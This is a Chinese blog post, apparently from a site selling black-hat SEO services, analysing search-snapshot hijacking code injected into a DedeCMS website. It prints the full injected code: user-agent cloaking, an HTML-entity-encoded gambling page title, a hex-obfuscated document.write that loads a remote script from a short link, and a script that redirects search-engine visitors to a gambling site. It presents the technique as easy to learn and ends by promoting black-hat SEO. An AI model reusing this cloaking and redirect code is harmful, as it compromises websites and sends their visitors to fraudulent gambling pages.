蜘蛛池出租

百度快照劫持大家應(yīng)該都聽(tīng)過(guò)，但具體是怎么回事呢？今天給大家講一下。 
有個(gè)朋友的站，是用dedecms做的，不得不吐槽一下，DEDECMS果然是漏洞百出，然后被HACK插入了代碼。今天我們來(lái)分析這幾行代碼，比較簡(jiǎn)單，也很容易學(xué)會(huì)。

【1】<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title = "{dede:global.cfg_webname/}"}</script>
大家來(lái)看這段JS，JS里面包含一個(gè)判斷，是根據(jù)什么判斷呢，這是是根據(jù)userAgent來(lái)判斷，如果不是百度來(lái)的，那就顯示dedecms本身的標(biāo)題，所以這也就是為什么我們直接打開(kāi)網(wǎng)頁(yè)，（輸入網(wǎng)址的方式打開(kāi)）而顯示正常標(biāo)題的原因。
【2】<title>&#22825;&#27941;&#26102;&#26102;&#24425;&#44;&#22825;
&#27941;&#26102;&#26102;&#24425;&#35268;&#21017;&#44;&#22825;
&#27941;&#26102;&#26102;&#24425;&#29609;&#27861;&#44;&#22825;
&#27941;&#26102;&#26102;&#24425;&#31283;&#36194;&#26041;&#26696;
&#45;&#24425;&#20048;&#22253;</title>
  
我們?cè)賮?lái)看這三行代碼，這三行代碼好像看不懂，不過(guò)他采用的是Unicode編碼，解碼以后，是“天津時(shí)時(shí)彩,天津時(shí)時(shí)彩規(guī)則,天津時(shí)時(shí)彩玩法,天津時(shí)時(shí)彩穩(wěn)贏方案-彩樂(lè)園”這一行代碼，搞懂了。
【3】
<script type="text/javascript">
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"] ('
\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a
\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x
72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x74\x2e\x63\x6e\x2f\x52\x6e\x
59\x30\x68\x4c\x6c\x22\x3e\x3c\x2
f\x73\x63\x72\x69\x70\x74\x3e');
</script>
解密出來(lái)就是這段話：
< script type = "text/javascript" > window["document"]["write"]('<script type="text/javascript" src="http://t.cn/RnY0hLl"></script>'); < /script>
意思是向首頁(yè)中插入這行代碼 
 
那為什么還是會(huì)跳轉(zhuǎn)呢？就是這行代碼的事，這個(gè)轉(zhuǎn)代碼其實(shí)是向原網(wǎng)頁(yè)插入一JS JS原地址 ：  
http://xxx.com/cly.js

而JS的內(nèi)容是如下內(nèi)容：
document.writeln("<script LANGUAGE=\'Javascript\'>");
document.writeln("var s=document.referrer");
document.writeln("if(s.indexOf(\'baidu\')>0 || s.indexOf(\'sogou\')>0 || s.indexOf(\'soso\')>0 ||s.indexOf(\'
sm\')>0 ||s.indexOf(\'uc\')>0 ||s.indexOf(\'bing\')>0 ||s.indexOf(\'yahoo\')>0 ||s.indexOf(\'so\')>0 ||s.indexOf(\'google\')>0)");
document.writeln("location.href=\'http://t.cn/RnYpcMt\';");
document.writeln("</script>");
document.writeln("");
document.writeln("");
 

明白的人就懂了，說(shuō)是百度快照 劫持，其實(shí)只要是搜索引擎來(lái)的都會(huì)劫持。跳轉(zhuǎn)到另一個(gè)短網(wǎng)址，而短網(wǎng)址解密出來(lái)：http://www.caileyuan.cc
就是這個(gè)BC網(wǎng)站，這些黑客真是煞費(fèi)苦心。 
今天的課程就分享完了，其實(shí)學(xué)習(xí)黑帽SEO并不難，主要是方法正確，認(rèn)真研究，都可以做得不錯(cuò)。

|轉(zhuǎn)載請(qǐng)注明來(lái)源地址：蜘蛛池出租 http://www.wholesalehouseflipping.com/
專注于SEO培訓(xùn)，快速排名黑帽SEO https://www.heimao.wiki